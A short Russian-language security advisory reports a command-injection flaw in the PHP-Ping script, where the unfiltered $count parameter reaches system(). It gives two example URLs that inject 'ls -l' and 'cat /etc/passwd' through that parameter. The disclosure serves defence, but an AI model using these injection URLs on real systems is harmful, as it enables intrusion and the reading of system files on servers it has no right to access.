Программа: PHP-Ping
Уязвимость обнаружена в PHP-Ping. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Уязвимость обнаружено в переменной $count, которая вызывает system() без какой либо фильтрации. Удаленный пользователь может представить специально обработанный URL, чтобы выполнить произвольные команды операционной системы на целевой системе.
Пример:
http://[target]/php-ping.php?count =1+%26+ls%20-l+%26&submit=Ping%21
http://[target]/php-ping.php?count =1+%26+cat%20/etc/passwd+ %26&submit=Ping%21
